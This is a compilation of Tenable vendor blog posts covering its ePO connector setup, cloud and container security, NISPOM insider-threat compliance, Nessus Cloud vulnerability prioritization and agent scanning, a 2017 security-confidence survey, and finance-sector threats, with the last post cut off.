With our recently released Tenable Connector for ePO, SecurityCenter® customers are now able to import market-leading vulnerability data into McAfee ePO. This rich and comprehensive vulnerability data includes security threats for managed hosts and rogue devices that SecurityCenter detects on a network. As a result, McAfee ePO customers now have critical visibility and context on systems, assets and data needed for an effective security program.

Connecting the two systems is easy. First, download the connector. Then follow the instructions below.

Installing the Tenable Connector for ePO

  1. Log on to McAfee ePO. From the drop-down Menu, click Extensions.

Installation Extensions

  1. Click Install Extension at the top of the page.
  1. Click Choose File.
  1. Select the file that you have downloaded from the portal and Open it.
  1. Click OK.
  1. Review the information to be sure that it is the correct extension and click OK.

Review extension information

  1. From the extension tree on the left, find the Tenable Security Connector under Third Party. Verify that everything was installed correctly by clicking on it. The connector will display a Running status.

Connector is running

Configuring the registered server

  1. Log on to ePO. From the Menu, click Registered Servers.

Registered Servers

  1. Click New Server at the top of the page.
  1. Give the SecurityCenter server a meaningful name, and click Next.
  1. Enter the configuration for your SecurityCenter installation: IP Address, Port Number, User Name and Password.

Enter configuration data

  1. Click the Test Connection button. This will check the credentials to make sure everything works. Click Save.
  1. The new server will be listed in the Registered Servers list with the name from step 3.

List of Registered Servers

Configuring the connector

  1. Log on to ePO. From the Menu, click Server Tasks.

Server Tasks

  1. In the Quick find search box, enter Tenable and click Apply.
  1. You should see a Tenable SecurityCenter Collect Task. Click Edit.

Tenable SecurityCenter Collect Task

  1. Change the schedule status to Enabled, and click Next.
  1. From the drop-down list, select the Registered Server you created previously.
  2. Select the schedule that works best for your environment to collect data from SecurityCenter. NOTE: You should only have one task configured at any given time; during the import process, all old data is purged. Click Next.

Schedule

  1. You should now see a summary of your configuration. If everything looks correct, click Save.

Configuration summary

Running the connector

At this point, the connector will run on your configured schedule. Alternatively, follow these steps to run the connector on-demand:

  1. Click Run in the Server Tasks list.

Run/Server Tasks

  1. This will pull the Server Task Log for the extension and display the current status of the import. Any errors or status updates will be in this log. The time to display the log depends on the amount of vulnerability data in SecurityCenter for the specified time frame.

Server Task Log status

Viewing the data from the connector

Tenable provides an ePO Dashboard with some basic charts and graphs of the imported data:

Tenable ePO Dashboard

The data can also be viewed on each host by using the system tree:

System Tree data view

With the Tenable-built, McAfee-certified connector, SecurityCenter data is automatically sent to the McAfee ePO console. Having this rich vulnerability assessment data enables ePO security professionals to make better informed decisions about action and remediation in their environment. The integration also enables McAfee ePO customers to maintain a complete and accurate inventory of all systems, whether managed by ePO or not.

For more information

See the McAfee Integration page for more information.

Securing an Expanding Cloud Infrastructure

$
0
0

Although cloud infrastructure is being implemented by many organizations, there still seems to be a degree of skepticism regarding its security. According to a survey conducted by SANS, 40% of organizations surveyed said unauthorized access to sensitive data from other tenants was the most pressing concern with public cloud deployments. Another 33% said they do not currently have enough visibility into their public cloud providers' operations. Do you share similar concerns? How can you address them, or at the very least mitigate them?

When we take into account how quickly an organization can set up various systems in a cloud infrastructure, the security of these systems must be brought to the forefront of discussion. Having the flexibility to quickly deploy, tear down, and redeploy systems is great, but how are you going to secure them?

Tenable solutions

Tenable delivers a comprehensive cloud security solution based on continuous network monitoring. This is accomplished by leveraging several of Tenable’s network sensors: active scanning, intelligent connectors, host data, and agent scans. Implementing these sensors in a cloud deployment delivers multiple data points to ensure continued security as your organization continues to grow.

Active scanning

Procedures and processes can get very convoluted when cloud infrastructures are implemented. It's another environment for which you must monitor credentials, system access, and privileges. With Nessus® Manager and Nessus Cloud, you can run audit and vulnerability scans on demand, or in pre-scheduled intervals to assess your systems in the cloud.

Intelligent connectors

While there are multiple vendors offering cloud solutions, Tenable has taken the extra step in providing seamless integration with some of the most widely used cloud providers. Nessus Manager and Nessus Cloud enable organizations to have access to unique templates created for several major cloud providers. Whether you have chosen to go with Amazon Web Services (AWS), Microsoft Azure, or Rackspace, Tenable has you covered with an easy to use security platform that integrates with these popular cloud services.

Nessus Cloud is now pre-authorized to scan Amazon Web Services (AWS) environments. Any customer with a Nessus Cloud license can launch a scanner into their AWS environment from the AWS Marketplace, point it at the targets they'd like to scan, and then view and manage the scan results in Nessus Cloud. Proper setup of the AWS scanner can be found in the How-To Guide.

Host data

As stated in the SANS survey, 40% of organizations said unauthorized access to sensitive data by other cloud tenants was the most concerning topic regarding cloud deployments. Tenable SecurityCenter Continuous View® (SecurityCenter CV™) is equipped with host data analysis capabilities to review many event types, such as stopped/running databases, admin and non-admin user events, and system configuration reviews. By leveraging host data such as that gathered by Tenable Log Correlation Engine®, SecurityCenter CV provides the insight you need to detect if there are any unauthorized actions happening in your cloud deployment.

Addressing the issue of securing new infrastructure, Tenable also gathers host configuration information. You can use this data to ensure that your cloud-based systems are configured to meet the security standards followed by your organization.

Agent scanning

One of the more difficult challenges facing organizations utilizing cloud infrastructure is continuous security. Using a cloud environment may increase an organization’s attack surface and inherently increase risk. By utilizing Nessus Cloud and Nessus Manager, you can better mitigate risk with their ability to perform agent scanning. Agents can be installed on cloud systems locally to collect vulnerability, compliance, and system data. By leveraging agent scans, your organization has yet another option for monitoring and securing your cloud environments. It's great having access to scan data that informs you of a cloud environment’s security posture at that time, but what about when you’re not actively running scans? You can install agents on your cloud hosts to report back vulnerabilities, compliance results, and system configurations and alert your team to unauthorized events and other items of concern.

Conclusion

Cloud infrastructure continues to be an incredible technology for expanding and adjusting your environment with unprecedented flexibility. However, there must be additional attention to security during implementation to ensure continued security during growth. With Tenable solutions, you can continue to expand at record rates while ensuring due diligence is applied to your cloud environment’s security.

Government and Industry Collaboration: The Long Path to Trust and Sharing

$
0
0

Agencies are stepping up to the plate and contributing active intelligence to threat sharing programs, a big step on the long and challenging path to effective cybersecurity information sharing.

Both government and industry have recognized for years that cooperation is necessary to defend against increasingly sophisticated, organized and well-resourced cyber adversaries. Sharing of threat information has been hampered by a lack of trust, however. Companies often are reluctant to share with competitors and even with partners. And everyone has been reluctant to share with government, which has been hesitant to share with the private sector.

Effective information sharing is beginning to occur

But cracks finally are appearing in these walls and effective information sharing is beginning to occur. Government agencies are taking a more active part in sharing programs, and technical standards for sharing across broader communities of interest are being developed.

Overcoming the fear of Big Brother

The role of government in sharing security information has been problematic. The federal government operates large IT enterprises and is charged with defending the nation’s critical infrastructure, making it both a prime source and consumer of threat intelligence. But concerns about liability, privacy and competition have made companies reluctant to provide information to government. Agencies, in turn, have been unwilling to share their own sensitive information.

This has resulted in barriers to getting information into the hands of those who need it. Ron Gula, in an opinion piece for the Christian Science Monitor’s Passcode published in October 2015, advocated greater government transparency in its cybersecurity efforts, saying that “security through obscurity” is not an effective policy.

The Homeland Security Department’s Automated Indicator Sharing (AIS) program has recently emerged as an enabler for sharing. AIS is a voluntary hub for exchanging information among public and private sector organizations. It began receiving and disseminating threat indicators in March, and according to reports some 40 companies and 10 agencies have signed on with AIS.

The government’s willingness to give as well as receive goes a long way toward building trust

Interestingly, the agencies are supplying most of the information and companies primarily are consumers. This demonstration of the government’s willingness to give as well as receive goes a long way toward building trust.

Building on standards

Sharing works best in formal programs with trusted partners and established policies and practices. Toward this end, technical standards and best practices are being developed by both government and industry.

Sharing works best in formal programs with trusted partners and established policies and practices

One of the challenges of sharing cybersecurity intelligence is that it is likely to contain sensitive information that can reveal things about the source of the intelligence, resulting in risks to confidentiality, privacy and liability. To help limit these risks, the National Institute of Standards and Technology has released Special Publication 800-150, a Guide to Cyber Threat Information Sharing.

“By exchanging cyber threat information within a sharing community, organizations can leverage the collective knowledge, experience, and capabilities to gain a more complete understanding of the threats the organization may face,” the authors write. They provide a list of recommendations for establishing information-sharing programs, relationships and capabilities.

As NIST points out, info sharing works best within communities, and industry-specific Information Sharing and Analysis Centers (ISACs) have been operating since 1999. There now are more than 20 ISACs sharing information. The administration now has broadened the criteria defining an info-sharing community beyond industry sectors under a 2015 executive order. According to DHS, new Information Sharing and Analysis Organizations (ISAOs) will accommodate groups that do not fit neatly into the sector-based ISAC structure.

“ISAOs may allow organizations to robustly participate in DHS information sharing programs even if they do not fit into an existing critical infrastructure sector, seek to collaborate with other companies in different ways (regionally, for example), or lack sufficient resources to share directly with the government,” DHS said.

A new ISAO Standards Organization has published the first set of voluntary standards for setting up private-sector ISAOs.

Taking part

Continuing the progress on the path to information sharing requires participation. Contributing and using cybersecurity information not only can help improve your agency’s cybersecurity posture, but helps create a more secure cyber ecosystem. To learn more about the best practices and standards for information sharing, you can read the publications from NIST and the ISAO Standards Organization.

To participate, check the resources at the DHS Automated Indicator Sharing program or the National Council of ISACs. A series of public meetings and workshops are being held to kick off the new ISAOs. Learn more about them at DHS or the ISAO Standards Organization.

While much work remains, the cybersecurity balance seems to be tipping away from self-interest to cooperation and that’s a good thing. After all, we’re all in this together.

Time Crunch: Federal Contractors Scramble to Clear NISPOM Change 2

$
0
0

Upon winning a government contract, many corporate executives breathe a sigh of relief. But these sighs may now be replaced by moans of frustration upon realizing what it takes to remain compliant with federal cybersecurity standards.

The National Industrial Security Policy Operating Manual (NISPOM) is a perfect example of tightening cybersecurity requirements for federal contractors, especially in the defense sector. Thousands of companies now are scrambling to meet the November 17 deadline to become compliant with the requirements of NISPOM Change 2, which targets insider threats in contractors’ organizations.

In light of insiders such as Edward Snowden and most recently Harold Thomas Martin III, who was arrested in August for taking classified NSA information home, the Department of Defense has increased efforts to regulate the need for insider threat detection programs for organizations contracting with the federal government.

NISPOM is the definitive guide for all U.S. government contractors who deal with classified information and need to understand the requirements their insider threat detection programs must meet in order to continue working with the federal government. NISPOM is administered by the Defense Department’s Defense Security Service (DSS) and NISPOM requirements are mandatory.

Change 2, which was approved in May, gave all contractors working with 31 government agencies with national security roles (as well as the DOD) six months to establish insider threat programs. Agencies covered are:

  • Department of Agriculture
  • Department of Commerce
  • Department of Education
  • Department of Health and Human Services
  • Department of Homeland Security
  • Department of Housing and Urban Development
  • Department of Justice
  • Department of Labor
  • Department of State
  • Department of the Interior
  • Department of the Treasury
  • Department of Transportation
  • Environmental Protection Agency
  • Executive Office of the President
  • Federal Communications Commission
  • Federal Reserve System
  • General Services Administration
  • Government Accountability Office
  • Millennium Challenge Corporation
  • National Aeronautics and Space Administration
  • National Archives and Records Administration
  • National Science Foundation
  • Nuclear Regulatory Commission
  • Office of Personnel Management
  • Overseas Private Investment Corporation
  • Small Business Administration
  • Social Security Administration
  • United States Agency for International Development
  • United States International Trade Commission
  • United States Postal Service
  • United States Trade Representative

Passing NISPOM

Contracting companies must create an effective insider threat detection program that meets the requirements of Executive Order 13587 in order to receive a Facility Security Clearance (FCL) under NISPOM. Change 2 outlines three main tasks contractors must take to receive an FCL:

1: Build an Insider Threat Detection Program

Contractors must put together a program capable of aggregating and analyzing cybersecurity data to extract actionable intelligence on potential insider threats. Contractors also must archive potential threats and routinely perform self-inspections, as well as report insider threat incidents to the government.

2: Name an Insider Threat Program Senior Official (ITPSO)

The ITPSO must be a U.S. citizen, a senior official in the company, and will be responsible for establishing and executing the insider threat program. This is crucial to meeting the requirements of NISPOM Change 2. Establishing a single point of contact and accountability is also a major requirement in several other cybersecurity regulations for organizations doing business in Europe, including Germany's IT Security Act (ITSG), which addresses the IT security of organizations that interact with German citizens and German companies.

3: Provide insider threat training

Training is a significant component of NISPOM Change 2. Training must cover such basic concepts as counterintelligence. Companies must also establish a process for responding to insider threat incidents.

Stronger with automation

The sand in the hourglass is running out for contracting companies that must meet the requirements of NISPOM Change 2. By working with Tenable Network Security solutions, organizations have access to the experience and tools necessary to build a state-of-the-art insider threat detection program and successfully navigate NISPOM Change 2.

The Insider Threat Dashboard and Report included in SecurityCenter Continuous View® (SecurityCenter CV™) empowers organizations to better understand the network activity of trusted sources and to identify suspicious and potentially malicious behavior. The report and dashboard help to monitor the activities of insiders—whether they are employees, contractors, or partners—the users who already have access to your organization's network and resources. The threat is that these insiders may either accidentally or intentionally do something to harm the network, compromise resources, or leak private data. Insider threats are different from external security threats in that they come from a "trusted” location within the network. Organizations trying to detect these threats face the challenge not only of differentiating attacks from "normal" traffic, but also of ensuring that security analysts and system administrators are not inundated with false positives from users performing legitimate tasks.

SecurityCenter CV also monitors and collects system data via the Log Correlation Engine® (LCE®). The information collected using passive and events-based sources assist security operations teams with monitoring users and their activities. Potential suspicious activity is noted, as well as the top users engaging in activity of interest. Login activity by user and users per host is also presented. In these latter two cases, potentially suspicious activity is noted on a per user or per host basis, to assist an analyst in connecting users to questionable activity and thus identifying insider threats.

An effective insider threat program that complies with NISPOM Change 2 requires that organizations know who and what is on their networks. Leveraging cutting-edge technologies can provide contractors with the visibility and understanding needed to protect their networks and to establish effective insider threat programs.

Containerization and Security

$
0
0

Containerization is not only an exciting foundation of DevOps; it is also an answer to several critical operational issues.

For developers, building software once, packaging it and running it anywhere regardless of library versions, dependencies, or underlying hardware and operating system has been a challenge.

For operations staff, setting up an environment that can run any new application consistently is reassuring, so that when the application goes into production, the system is reliable and can be trusted to run smoothly.

For production staff, implementing a new package easily is a huge time saver.

For all these professionals, containers are helping a dream become a reality.

What are containers?

Containers are lightweight, portable software packages with everything needed at runtime

While containers are a hot topic, they are not new. Docker is arguably the company that launched the current container market. But container technology has been with us for several years, principally in Linux as LXC. Containers are lightweight, portable software packages with everything needed at runtime: code, system tools, and libraries. While containers are similar to virtual machines (VMs), they are much smaller and more efficient. Along with the application itself, a VM includes the overhead of the entire guest operating system, binaries and libraries, and it requires a hypervisor for management on a server. A container is a much lighter weight package (think of twenty megabytes instead of twenty gigabytes); it shares the operating system kernel via API calls with other containers on a host. Containers are a means of consistently moving and deploying applications into different environments, because a container includes the entire runtime environment needed for the application – libraries, dependencies, configuration files, etc. – eliminating the differences in OS distributions and guaranteeing that the software will always run the same, regardless of the environment.

The benefits of containers

Not only are containers small and efficient, but they are also highly dynamic. They can start up or shut down quickly. They can run for just hours or for days. They can be deleted and replaced.

Containers are increasingly being used for web services, such as Google Apps. Containers make it easy to develop web apps that are composed of hundreds of microservices, replacing a monolithic backend. Microservices accelerate development by separating functionality for efficiency and maintainability.

Containerization provides isolation for microservices from other processes, a lightweight deployment mechanism, a stateless package, and the ability to build and rebuild services on the fly. Containers contribute to easier and quicker application delivery, and faster and more reliable deployment. Hundreds of containers can be run on just one server, saving valuable data center budget. Docker containers can run on virtually any computer, infrastructure, or cloud. Container management is therefore much less painful for operators.

Container security

Infosec professionals generally consider containers less secure than VMs

But because containers are not isolated from one another to the same degree that virtual machines on a shared host are, and because containers are usually not scanned for vulnerabilities before or after being deployed to production, infosec professionals generally consider containers less secure than VMs. A vulnerability in a shared OS kernel can potentially provide a way into a container. Active scans can miss most of them. Containers also typically don’t include the SSH daemon, so credentialed scans don’t work with most containers. Microservices and containers can introduce hundreds of endpoints and erode the visibility of security risks.

Tenable has been addressing container security since early 2016, with Nessus offering the ability to detect running Docker hosts and the containers running on them. Nessus can also audit Docker hosts against the CIS Docker v1.6+ benchmark to help harden container hosts. Discovering and securing Docker hosts is an important first step, but it’s not enough. Without comprehensive, continuous monitoring, you may not be able to see and assess all container configurations and instances. A new kind of security solution is needed.

Tenable now offers a better approach to container security

Because containers are rebuilt on the fly and exist for short periods of time, organizations have struggled to continuously assess Docker containers and similar environments for vulnerabilities. Tenable now offers a better approach to container security – a solution that monitors container images for vulnerabilities during the development lifecycle, before deployment, to ensure containers are vulnerability-free in production.

The recent acquisition of FlawCheck, the leader in container security, enables Tenable to deliver innovative technology to organizations that want to integrate security into their build pipeline. This helps provide a real-time view of their CI/CD (continuous integration and continuous deployment) environments for vulnerability and malware detection in Docker container images.

Flawcheck in the devops pipeline
FlawCheck scans container images in the Test phase of the DevOps pipeline

FlawCheck scans container images for vulnerabilities and provides continuous monitoring early in the DevOps lifecycle. An application need not be running to be discovered and scanned; the container image for that app is stored and scanned, providing timely security assurance before an application or service is launched.

FlawCheck revolutionizes DevOps security

For organizations with large development teams, FlawCheck revolutionizes DevOps security, moving security into the development pipeline for real-time on-the-fly security auditing. Security is baked into containers before they are ever deployed onto networks.

For more information

Vulnerability Prioritization with Nessus Cloud

$
0
0

If you’re a security professional, vulnerability prioritization is likely something you deal with frequently. Few, if any organizations ever address 100% of discovered vulnerabilities, as new vulnerabilities come out every day and old vulnerabilities can hide out on unknown and shadow assets or simply never make it to the top of the patching priority list.

Vulnerabilities that don’t get addressed cause problems. In last year’s Data Breach Investigations Report (DBIR), Verizon noted that 99.9% of the exploited vulnerabilities were compromised more than a year after the CVE was published.

Addressing 100% of vulnerabilities 100% of the time is not an achievable goal for most organizations. But being able to prioritize those that pose the highest risk is something that most organizations should be able to accomplish using a solution like Nessus® Cloud. Here are a few tips for using Nessus Cloud to prioritize your vulnerabilities list.

Scoring vulnerabilities with CVSS

The industry standard for communicating the severity of vulnerabilities is the Common Vulnerability Scoring System, or CVSS. The CVSS uses an algorithm based on metrics in three different areas that approximate the ease and impact of exploiting a vulnerability. Our EMEA technical director, Gavin Millard gives a good explanation of the three CVSS scoring areas (base, temporal, environmental) in this on-demand webcast if you’d like to learn more about CVSS.

Addressing 100% of vulnerabilities 100% of the time is not an achievable goal for most organizations

As an industry standard, Nessus Cloud uses CVSS in multiple ways. First, when Nessus Cloud identifies a vulnerability as Critical, High, Medium, Low or Informational, it uses CVSS scores to assign those categories:

Risk information

You can also use the Nessus Cloud Advanced Search capability to identify vulnerabilities with specific CVSS characteristics. For example, many organizations rely on CVSS Base Scores, the metrics that measure how easy it is to access a vulnerability. In Advanced Search, it’s easy to identify vulnerabilities cataloged on your network that have a CVSS Base Score of 7.5 or higher. This search would list all of the High severity vulnerabilities:

Advanced Search by CVSS

Additional search filters

CVSS provides a number you can associate with each vulnerability; but by using Advanced Search, there are a few other search filters that provide additional context from the mountain of vulnerabilities.

Tenable announced several of these advanced search filters for Nessus Cloud last year. One of my favorites is the In the News filter. Your CISO may have just read about a big new vulnerability, such as Heartbleed, Shellshock, or Ghost, that has caught the attention of the media. The In the News filter can identify these high profile vulnerabilities and therefore help your security team mitigate the newsworthy questions so that when asked, you can confidently state that you have taken care of the big vulnerability that’s making headlines.

Advanced Search for vulnerabilities in the news

Identifying vulnerabilities on specific assets - or not

Earlier this year, Asset Lists and Exclusions were introduced in Nessus Cloud. Asset Lists are a way to organize hosts into groups. For example, hosts that fall under the same compliance area could be placed into a list, such as all hosts that fall under PCI DSS. Asset Lists have several benefits. You can scan similar assets using the most appropriate scan policies and frequencies. Asset lists also make it easier to share vulnerability information with the appropriate business group, which can simplify the remediation process.

Assets Lists can also be useful if and when you need to scan specific assets at a specific time. For example, you might want to scan all your PCI assets immediately before an annual PCI audit.

On the other hand, Exclusions enable you to restrict the scanning of specific hosts based on a given schedule. If there is a situation where one or many hosts do not need to be included in a scan, you can omit them and simplify your vulnerability results.

Dashboards

While CVSS, Advanced Search Filters, Asset Lists, and Exclusions are all useful ways to prioritize vulnerabilities, sometimes you just need to see the big picture. To accomplish this, Nessus Cloud offers dashboards that provide a graphical representation of vulnerability trending data over time.

You can use the dashboards to quickly get an overall view of vulnerabilities in your environment as well as to identify if you are meeting goals and policies set forth by your organization. Let’s say your organization has a policy that it will not tolerate more than 25 critical vulnerabilities open at any time. In the example below, even though there are 19 critical vulnerabilities open, you know you’re within policy; so maybe you could mix some vulnerability remediation work with another important project instead of just focusing on remediation efforts.

Dashboard overview of vulnerabilities in your system

This same dashboard helps you track how long vulnerabilities have been open. As I noted earlier, last year’s Verizon DBIR highlighted how often old vulnerabilities end up being the path attackers take to gain access to networks. The dashboard could help you identify critical vulnerabilities that could lead to actual breaches.

Starting with the dashboard, you can access an interactive list of all vulnerabilities that are more than 30 days old and easily drill down to details for a specific host exhibiting an old security hole.

Dashboard - how long vulnerabilities have been open

Try Nessus Cloud

Nessus Cloud provides insight into the vulnerabilities on your network that should be given your immediate attention

If you aren’t already using Nessus Cloud and would like to try any of these vulnerability prioritization techniques, you can request a free Nessus Cloud evaluation. Try out the ideas from this article and see even more ways that Nessus Cloud provides insight into the vulnerabilities on your network that should be given your immediate attention.

Continue the vulnerability prioritization conversation on Tenable’s Discussion Forums at https://community.tenable.com/welcome, or on Twitter @TenableSecurity.

Thanks to Diane Garey for assisting with this blog.


Actively Monitoring a Mobile Workforce with SecurityCenter

$
0
0

As the boundaries of the traditional workplace expand from users in the traditional single office building to mobile road warriors and remote workers, the effectiveness of a vulnerability management program across all endpoints becomes more challenging. Systems and devices that are not connected to a local network cannot be scanned reliably and can incur more risk to the organization. When more systems and technologies are placed outside of the corporate firewall, the organization can face additional challenges. For example, scanned systems with external IP addresses can frequently change from employer-owned devices to systems of another organization or nation. Or systems hosting the scanners could be compromised themselves which could reduce network protection, especially if the normal defense in depth strategies are lacking. To address such issues, Tenable has an easy to use, secure and reliable solution.

Nessus Cloud

The Tenable Nessus® Cloud is a SaaS vulnerability management solution that combines the powerful detection, scanning and auditing features of Nessus with multi-user support. Nessus Cloud supports sharing of scanning resources like scanners, policies, and schedules; it also supports agent-based scanning. Nessus agent scanning enables administrators to install an agent on a local computer. Then as scans are scheduled, the agent will contact Nessus Cloud and run the policy defined for that agent group. 

Organizations that embrace and deploy Nessus Cloud agents greatly benefit from a consistent and scalable total vulnerability scanning solution

Organizations that embrace and deploy Nessus Cloud agents greatly benefit from a consistent and scalable total vulnerability scanning solution. Traditional models of vulnerability scanning assumed all systems and devices could be reached through internal networks. However, modern organizations need a model where any device can reside on an internal network, be relocated to another location in the office with all networked features intact, and used remotely at non-company locations such as a hotel while still being actively available for vulnerability scanning. With Nessus Agents, users and their computers can move to any internet-accessible network and still enable analysts to scan and assess the system. Pairing the functionality and depth of SecurityCenter® with the reach of Nessus Cloud, organizations greatly increase the visibility and coverage to scan systems across the world. This native functionality reduces complexities and enables organizations to seamlessly and quickly identify and triage vulnerabilities, regardless of where a device is in the world.

Nessus Cloud scalability and flexibility

The ability for Nessus Cloud to scale to a large number of assets with Nessus Agents helps you organize these systems into agent groups, which extends the asset list functionality in Tenable SecurityCenter. The agent groups enable you to group similar devices and then track groups by assigning the group a scan policy name in SecurityCenter. By using a scan policy name, SecurityCenter can use the plugin text found in Tenable Nessus plugin 19506 to identify the policy to create a Dynamic Asset. As the name implies, the asset is dynamic and automatically updates the asset list to be used for further analysis within SecurityCenter. 

Here is a sample output from Nessus plugin 19506 identifying the host that was scanned in Nessus Cloud using an agent scan:

Plugin 19506 output

SecurityCenter supports two primary methods of scanning systems using Nessus Cloud: active and agent-based

SecurityCenter supports two primary methods of scanning systems using Nessus Cloud: active and agent-based. For active scanning, the Nessus Cloud instance operates like any other Nessus scanner you may already use for traditional vulnerability scanning. However, when an agent scan is required, the first step is to set up an agent scan policy in Nessus Cloud. Within SecurityCenter, go to Scans>Agent Scans and click on Add an Agent Scan.

Adding an agent scan in Nessus Cloud

For additional detailed information on how to configure the Nessus Agents, review the whitepaper about agent support.

Nessus Cloud scanning

When you configure scans within SecurityCenter to collect Nessus agent data, you can compare vulnerability data collected from agent scanning to data collected from active scanning. By using plugin 19506, there are predefined assets available to identify systems scanned with and without agents. The dynamic assets are:

  • Scanned by Nessus without Agent Software - Plugin 19506: This plugin output contains “Scan type : Normal” indicating a normal or active Nessus scan was performed on the system
  • Scanned with Linux, Unix, or macOS Agent - Plugin 19506: This plugin output contains “Scan type : Unix Agent” indicating a Linux, Unix, or macOS agent was used to collect the vulnerability data
  • Scanned with Windows Agent - Plugin 19506: This plugin output contains “Scan type : Windows Agent” indicating a Windows agent was used to collect the vulnerability data

You can also use these assets as filters in matrices and other components to review vulnerability data and to compare it to data collected via other methods.

Incorporating Nessus Cloud scan data into your SecurityCenter workflow

When you use the Nessus Scan Summary Dashboards within SecurityCenter, you can quickly see the number of devices identified on the network without the use of an asset:

Nessus scan summary dashboards

However, to derive more data from SecurityCenter, you can use the assets mentioned above to create a matrix that compares the data from each asset location. In the sample matrix below, test assets have been applied as the filter along with a vulnerability severity level. You can see further information by clicking on the cell in the matrix, and also by viewing the filters applied from the matrix in the Vulnerability Analysis screen:

Custom dashboard to compare data from each asset location

SecurityCenter and Nessus Cloud: the cloud-backed solution for device monitoring

By using SecurityCenter with Nessus Cloud, you can quickly set up a series of components to view in-depth information of devices and assets across the organization. Additionally, you can analyze the risk of local systems compared to systems detected by Nessus Cloud and Nessus Agents. Comparing data from these two asset groups can help you tailor updates and protective software to better suit each device in your unique environment.

Global Cybersecurity Confidence Declines

$
0
0

The newly released 2017 Tenable Network Security Global Cybersecurity Assurance Report Card, with research conducted by CyberEdge Group, updates findings from the 2016 Global Cybersecurity Assurance Report Card. With the addition of France, India and Japan, Tenable surveyed 700 security practitioners from nine different countries across seven industry verticals. The report assesses the overall confidence levels of information security professionals in detecting and mitigating organizational cyber risk.

Global trends

This year, overall confidence levels dropped by six points to a 70%, or a C-, reflecting a decline in perceptions of global cyber readiness, fueled by the challenges of assessing and mitigating cyber risks across the evolving threat landscape. According to the data, many IT security pros feel overwhelmed by the number of breaches, and are struggling to keep pace with cloud adoption, mobile computing, DevOps environments, containerization platforms, web apps and more.

Collectively, participants scored just 61% on the Risk Assessment Index, a 12-point drop from 2016, and 79% on the Security Assurance Index, which remains unchanged.

New to the 2017 report, containerization platforms and DevOps environments are a growing concern across all countries and industries. In fact, global cybersecurity practitioners gave themselves a D on their overall ability to assess risk, with failing grades for emerging tech, including containers (52%), DevOps (57%) and mobile (57%). Compared to last year, confidence in cloud security dipped seven points to 60% or a D-.

There isn’t one contributing factor to the massive decline in Risk Assessment scores; it’s a by-product of the ephemeral nature of assets and the expanding attack surface

The biggest takeaway, however, is that there isn’t one contributing factor to the massive decline in Risk Assessment scores; it’s a by-product of the ephemeral nature of assets and the expanding attack surface. The modern enterprise network includes mobile, cloud, web apps, internet of things, BYOD, containers and virtual machines that must be constantly maintained and secured. Technology drives innovation, but it also creates more complexities and room for vulnerabilities to work their way into the network.

While alarming, the 12-percentage point drop in Risk Assessment indicates that respondents understand the challenges of today’s complex and interconnected attack surface while acknowledging gaps in their ability to assess risk in emerging technologies.

Staying positive

Although overall confidence was down in five out of the six returning countries and five out of seven industries, levels of optimism remained comparable to last year, with 43% of respondents feeling “somewhat more optimistic,” compared to 38% last year.

Additionally, the two highest global Security Assurance Index scores were the ability of security professionals to measure security effectiveness: 83% or B, and the ability to convey risk to business executives and the board: 80% or B-.

This signifies a level of growth and maturity among security professionals, and their commitment to aligning security with business objectives. Higher Security Assurance grades mean that respondents feel comfortable talking about and reporting on network security, and sharing information with the c-suite.

The road to improvement

It’s more important than ever to have continuous visibility into all assets across cloud, hybrid and on-premises environments

What can security professionals do to improve Risk Assessment and Security Assurance scores? One of the best starting points is to know exactly what is on a network at all times. You can’t secure what you don’t know about, and in today’s highly distributed and complex IT landscape, it’s more important than ever to have continuous visibility into all assets across cloud, hybrid and on-premises environments. Staying ahead of the security challenges that accompany new trends and technologies is also a priority.

Change often occurs at the highest level, so it’s also important to measure security effectiveness and to communicate risk up the chain. One way for infosec pros to convince business executives that cybersecurity should be treated as a top business concern is to have the right metrics and reporting procedures in place, readily available and easily digestible for decision makers who lack in-depth security expertise. That starts with having a resilient security program with the right visibility and context needed to not only identify network threats, but also provide data and benchmarks to drive improvement.

More information

You can access the full 2017 Global Cybersecurity Assurance Report Card, download infographics and other assets, and read about the survey methodology in more detail on the 2017 Global Cybersecurity Assurance Report Card landing page. To compare year-over-year results, check out the 2016 Global Cybersecurity Assurance Report Card landing page and summary blog. And stay tuned for on-demand webinars coming in early January 2017.

Top 3 Cybersecurity Challenges Facing the Finance Sector in 2017

$
0
0

The finance sector is no stranger to adversity. Financial service organizations have been beleaguered by recessions, lackluster stock prices, unprecedented competition, tough new regulations, and constant cyberattacks. In fact, these recent challenges have changed the entire industry. Battle-tested, the organizations that survived this chaotic time are poised to flex their leaner, more mobile and agile capabilities in 2017. By many indications, next year appears to be one where we start to see a stronger, grittier sector - a stark contrast to the banking systems of the past.

When I started working in this sector about a decade ago, IT security meant an access control policy, a firewall and a robust anti-virus platform. Today, large banks are often pioneering proprietary, leading-edge cybersecurity software. The close collaboration between banking IT security and top cybersecurity companies is unlike any other sector.

Large banks are often pioneering proprietary, leading-edge cybersecurity software

Banks are more prepared to handle cybersecurity threats these days, but challenges still loom. Take a look at the top three challenges that financial organizations will face in the new year:

1: Emerging technology challenges

Recently, the world suffered from distributed denial of service (DDoS) attacks spawned from a botnet made up of so-called smart devices within the Internet of Things (IoT). Shortly after one attack, the perpetrator publicly released the code used in the DDoS assault on the KrebsOnSecurity website, making it available for anyone to use.

The code, called Mirai, is designed to search for and attack internet-connected devices that are protected by default passwords and usernames. Because Mirai is basically now an open source hacking tool that can tap into millions of unsecured IoT devices and sensors, organizations in all sectors are going to be vulnerable to DDoS assaults.

A challenge in the finance sector that makes this style of attack potentially crippling is that banks need to provide customers access to their money. A downed website because of a DDoS attack could anger a lot of customers, something no bank ever wants to face.

2: Nefarious insider challenges

Attacks from insider threats will also pose a larger problem in 2017. In particular, attacks stemming from the dark web, which has been reaching out to insiders to buy their login credentials or has attempted to get insiders to sell intellectual property, will be a big problem. An insider attack may not just be a disgruntled employee; the threat could be someone who is tempted by outside influences and bribed to share inside information.

Retail banks, or those that still operate with a large physical presence, use tellers. According to a recent study by scheduling-software company FMSI: "many banks struggle with finding and keeping good part-time [tellers] employees, leading to undesirable results."

Tellers are often not happy with their jobs, are underpaid, deal with the threat of armed robbery and stand all day dealing with constant, complex customer issues. Their job also requires a lot of skill and training and is now more “digital” than ever before. Someone working a job like that is a perfect target for organizations looking for insider information for an attack. Offering several thousand dollars for a password or other security information can be quite compelling.

Financial organizations will need to build and bolster insider threat detection programs in 2017 or face a new wave of successful attacks.

3: Regulation challenges

